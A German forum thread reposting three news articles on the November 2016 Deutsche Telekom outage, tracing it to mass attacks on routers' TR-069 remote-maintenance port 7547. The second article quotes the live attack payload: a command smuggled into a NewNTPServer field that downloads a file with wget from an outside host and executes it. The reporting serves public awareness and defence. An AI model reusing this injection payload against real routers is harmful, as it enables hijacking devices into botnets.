Zitat
Deutsche-Telekom-Störung: Verdacht auf Hackerangriff
Hans-Christian Dirscherl
Viele Kunden der Deutschen Telekom können seit Sonntag weder Internet, noch Telefonie noch TV via Internet nutzen. Offensichtlich handelt es sich um eine bundesweite Störung. Update: Hockerangriff?
Update 28.11., 10.15 Uhr: Möglicherweise Hackerangriff?
Die Deutsche Telekom hat auf ihrer Facebook-Seite ein Update veröffentlicht . Demnach sind rund 900.000 Kunden mit bestimmten Routern von dem Ausfall der Internetverbindung betroffen. Welche Router genau betroffen sind, würde die Telekom derzeit noch prüfen.
Wörtlich schreibt die Telekom: „Es gibt kein klares Fehlerbild: Manche erleben zeitweise Einschränkungen oder sehr starke Schwankungen in der Qualität. Es gibt aber auch Kunden bei denen derzeit gar nichts geht. Aufgrund des Fehlerbildes ist nicht auszuschließen, dass auf Router gezielt Einfluss von außen genommen wurde, mit dem Ergebnis, dass sie sich nicht mehr im Netz anmelden können.
Experten der Telekom und die Hersteller der Router arbeiten schon die ganze Nacht durch an einer Lösung. Wir empfehlen weiterhin, bei Problemen den Router vom Netz zu nehmen, auch wenn das gestern womöglich nicht den gewünschten Erfolg gebracht hat. Wir bringen ständig neue Lösungen ins Netz ein.
Noch ein Hinweis: Es ist immer wieder zu lesen, dass besonders die Ballungsgebiete betroffen sind. Dem ist nicht so, es gibt keinen lokalen Schwerpunkt. Die Häufung des Fehlerbildes in den Ballungsgebieten ergibt sich aus der Bevölkerungsverteilung und ist somit ausschließlich ein statistisches Ergebnis.“
Zitat Ende.
Die Formulierung „dass auf Router gezielt Einfluss von außen genommen wurde“ klingt nach einem Hackerangriff. Offiziell hat die Telekom das aber noch nicht bestätigt.
Update Ende, Beginn der ursprünglichen Meldung zum Ausfall des Telekom-Netzes
Seit Sonntag ist das Netz der Deutschen Telekom in vielen Teilen Deutschlands gestört. Von dem Ausfall sind die Internetverbindungen, die Telefonie und auch der TV-Empfang via Internet betroffen. Die Störungen begannen anscheinend gegen 16.00 Uhr am Sonntag, den 27. November 2016.
Der Grund für den Ausfall des Telekom-Netzes ist nach wie vor unbekannt. Die Deutsche Telekom empfiehlt auf ihrer Facebookseite: „Die Störung besteht weiterhin. Wir empfehlen den Router kurz vom Stromnetz zu trennen (Netzstecker ziehen). In vielen Fällen sind danach die Probleme behoben.“
Doch ganz so einfach ist es eben nicht, wie viele betroffene Telekom-Kunden unter das obige Facebook-Posting der Telekom geschrieben haben, zum Beispiel dieser Kunde: „Das ist ein Witz, das habe ich gestern bestimmt gefühlte 30 mal gemacht und es hat rein gar nichts gebracht! Komme aus Bocholt, seit gestern ca. 15:00 Uhr kein Netz.“ Diese negative Erfahrungen haben offensichtlich schon einige Telekom-Kunden gemacht; einer schreibt, dass das Trennen des Routers vom Stromnetz nur für zirka eine Stunde helfen würde. Danach wäre der Telekomanschluss wieder tot. Wieder ein anderer Leser spekuliert: „Wenn das stimmt, was man in anderen Foren liest, dann kann es sich hier um einen massiven Hackerangriff auf Speedportrouter handeln. Oder wie andere vermuten, dass eine neue Firmware eingespielt wurde, die Fehlerhaft ist. Sollte eines von beiden zutreffen, wäre das der SuperGau“.(alle Zitate geben wir unverändert mit Original-Schreibweise wieder).
Die Hinweise der Telekom-Kunden auf der Telekom-Facebookseite stammen aus allen Teilen Deutschlands. Ganz offensichtlich handelt es sich also um eine bundesweite Störung des Telekomnetzes. Laut FAZ scheinen aber das „Ruhrgebiet, die Region rund um Frankfurt am Main sowie die Großstädte Hamburg und Berlin“ Schwerpunkte der Störung zu sein. Es gibt auf der Facebookseite der Telekom aber auch Störungsmeldungen von Telekomkunden aus Bayern, Sachsen und zum Beispiel auch aus Lübeck.
© http://www.pcwelt.de/news/Deutsche-Telek...=605359&pm_ln=3
Sola Scriptura
In a world without walls and fences,
who needs windows and gates?
Linux is like a wigwam with an Apache inside
¥€$ WE $CAN
Beiträge: | 8.839 |
Registriert am: | 11.01.2010 |
Zitat
Nach Großstörung bei der Telekom: heise Security bietet TR069-Test
Jürgen Schmidt
Mit einem weltweiten Angriff auf Router haben Unbekannte am Wochenende hunderttausende von Internet-Verbindungen von Telekom-Kunden gekappt. Dabei war das nur ein Nebeneffekt der schlecht programmierten Angriffssoftware. Der eigentliche Plan war, die Router zu kapern. Mit dem Netzwerkcheck von heise Security können Sie jetzt testen, ob auch Ihr Router aus dem Internet angreifbar wäre.
Die Angriffe richten sich auf den Fernwartungs-Port 7547 für TR-069. Durch einen dummen Fehler in der Implementierung des Protokolls kann man manche Router offenbar durch eine geschickt gestrickte Anweisung, einen neuen Zeitserver zu verwenden (NTP) dazu bewegen, eine Datei aus dem Internet herunterzuladen und auszuführen.
Router selbst auf TR-069 testen
Mit dem Netzwerkcheck von heise Security kann man ganz einfach testen, ob der eigene Router auf TR-069-Anfragen aus dem Internet antwortet.
Netzwerkcheck auf TR-069 testen
Dieser Test überprüft, ob bei Ihrem Router auf dem zugehörigen Netzwerk-Port ein Dienst antwortet. Erscheint in der Zeile zu Port 7547 ein grünes gefiltert oder geschlossen besteht akut keine Gefahr. Dann ist entweder auf dem Router selbst kein TR-069 erreichbar oder Ihr Provider filtert die Zugriffe. Darüber hinaus kann es aber auch sein, dass Ihr System bereits infiziert ist. Wenn die Angriffs-Software nämlich funktioniert, sperrt sie ebenfalls Zugriffe auf den TR-069-Port, um eine erneute Infektion zu verhindern. Wir haben derzeit keine Möglichkeit, diesen Sachverhalt zu entdecken. Wenn der Port für TR-069 aus dem Internet erreichbar ist, haben Sie unter Umständen ein Problem.
Zeigt der Test jedoch ein rotes offen an, dann konnte unser Test TR-069 auf Ihrem System erreichen. Das heißt noch nicht, dass Ihr Router die gerade ausgenutzte Lücke auch tatsächlich aufweist. Denn der Test führt keinen Angriff durch. (Das machen derzeit offenbar tausende von bereits infizierten Routern. Bei unseren eigenen Tests des Netzwerkchecks simulierten wir mit "netcat -l -p 7547" einen offenen TR-069-Port. Der wurde schneller von fremden System angegriffen, als wir selbst unsere Tests starten konnten).
Die Angriffe aus dem Internet kamen schneller als wir unsere eigenen Tests starten konnten.
Die Angriffe aus dem Internet kamen schneller als wir unsere eigenen Tests starten konnten. Vergrößern Es kann also durchaus sein, dass Ihr Router zwar TR-069 spricht, aber für den NTPServer-Trick nicht anfällig ist. Aber vielleicht weist er eine andere TR-069-Schwachstelle auf. Es ist in solchen Fällen eine gute Idee, in der Router-Konfiguration TR-069 abzuschalten. Geht das nicht, etwa weil der Router von Provider gestellt und gewartet wird, sollten Sie diesen auf das mögliche Problem hinweisen.
Aktive Angriffe auf den TRE-069-Port sehen derzeit so aus:
<NewNTPServer1>
`cd /tmp;wget http://tr069.pw/1;chmod 777 1;./1`
</NewNTPServer1>
Betroffen sind unter anderem viele Speedport-Modelle der Telekom; aber auch andere Router weisen dieses Problem auf. Bereits 2014 wurde bekannt, dass Millionen DSL-Router durch TR-069-Fernwartung kompromittierbar sind. Es ist also keine gute Idee, wenn das komplette Internet auf diesen TR-069-Port des Routers zugreifen kann. Mittlerweile erklärt zumindest die Telekom, dass sie in Ihrem Netz alle Zugriffe auf TR-069 blockieren will. (ju)
Sola Scriptura
In a world without walls and fences,
who needs windows and gates?
Linux is like a wigwam with an Apache inside
¥€$ WE $CAN
Beiträge: | 8.839 |
Registriert am: | 11.01.2010 |
Zitat
Großstörung bei der Telekom: Was wirklich geschah
Jürgen Schmidt
Ein Sicherheitsexperte hat die Reaktion eines der anfälligen Speedport-Modelle analysiert und kommt zu einer überraschenden Erkenntnis: Die Geräte waren gar nicht anfällig für die TR-069-Sicherheitslücke.
Direkt nach dem Ausfall vieler DSL-Anschlüsse stellte sich heraus, dass diese in direktem Zusammenhang mit den gleichzeitig beobachteten, massiven Angriffen auf den Fernwartungs-Port TR-069 standen. Viele Experten – und auch heise Security – gingen davon aus, dass die Geräte im Prinzip ebenfalls für diese Angriffe anfällig wären und die Ursache der Ausfälle eine fehlerhafte Infektionsroutine war. Ralf-Philipp Weinmann ging der Sache auf den Grund und kam zu der überraschenden Erkenntnis, dass das Problem ganz anders lag.
Die Telekom prüft Hinweise auf Hackerangriff
Derzeit werden alle Systeme im Internet im Minutentakt mit TR-069-Anfragen auf Port 7547 bombardiert. Diese versuchen, eine Sicherheitslücke auszunutzen, die ein Nutzer namens "kenzo2017" am 7. November 2016 in einem Blog veröffentlichte. Sie bezog sich auf Zyxel-Router, die der irische Provider Eir an seine Kunden verteilte. Deren Linux-Betriebssystem ließ sich durch einen Befehl zum Hinzufügen eines Zeit-Servers (NewNTPServer) dazu bewegen, ein Programm aus dem Internet herunterzuladen und auszuführen. Die derzeit grassierenden TR-069-Angriffe sind zum Großteil auf ein Mirai-ähnliches Bot-Netz aus infizierten Linux-Routern dieses Providers zurückzuführen.
Speedport ohne Linux
Nun handelt es sich bei den betroffenen Speedports der Telekom nicht um Zyxel-Router, ja nicht einmal um Router auf Linux-Basis. Vielmehr setzt der taiwanische Hersteller Arcadyan ein eigenes Echtzeitbetriebssystem ein, das gerüchteweise den Namen "SuperTask" trägt. Und dessen TR-069-Implementierung ist auch nicht für den NewNTPServer-Fehler anfällig, wie Weinmann herausfand. Als er sein Testgerät mit diesem Angriff attackierte, geschah – gar nichts. Erst als Weinmann das Gerät wiederholten Angriffen aussetzte, verweigerte es irgendwann den Dienst und stellte alle Netzwerk-Aktivitäten ein.
Das ist genau das, was viele hunderttausend Telekom-Kunden am letzten Wochenende bei sich beobachteten: Sie hatten kein Internet mehr und nach einem Neustart des Routers funktionierte es kurzzeitig wieder – bis die regelmäßigen TR-069-Angriffe das Gerät erneut lahm legten. Eine wie auch immer geartete Infektion gab es dabei nicht. Die Angriffe hätten also die Telekom-Router gar nicht infizieren können, weil diese die TR-069-Lücke gar nicht aufwiesen. Es handelt sich lediglich um ein Denial-of-Service-Problem, das erst durch massenhafte Anfragen ausgelöst wurde.
Versäumnis der Telekom
Fehler kann man der Telekom natürlich trotzdem vorwerfen: Der Fernwartungs-Port TR-069 hätte nicht offen aus dem Internet erreichbar sein dürfen. Auch wenn die Router für die aktuellen Angriffe nicht anfällig waren, kann man gerade bei einem solchen selbstgestrickten Betriebssystem mit proprietärer TR-069-Implentierung getrost davon ausgehen, dass es andere Sicherheitslücken aufweist, die sich missbrauchen lassen. Weinmann deutet auch bereits an, weitere Fehler gefunden und der Telekom gemeldet zu haben.
© https://www.heise.de/security/meldung/Gr...ah-3520212.html
Sola Scriptura
In a world without walls and fences,
who needs windows and gates?
Linux is like a wigwam with an Apache inside
¥€$ WE $CAN
Beiträge: | 8.839 |
Registriert am: | 11.01.2010 |
Einfach ein eigenes Forum erstellen |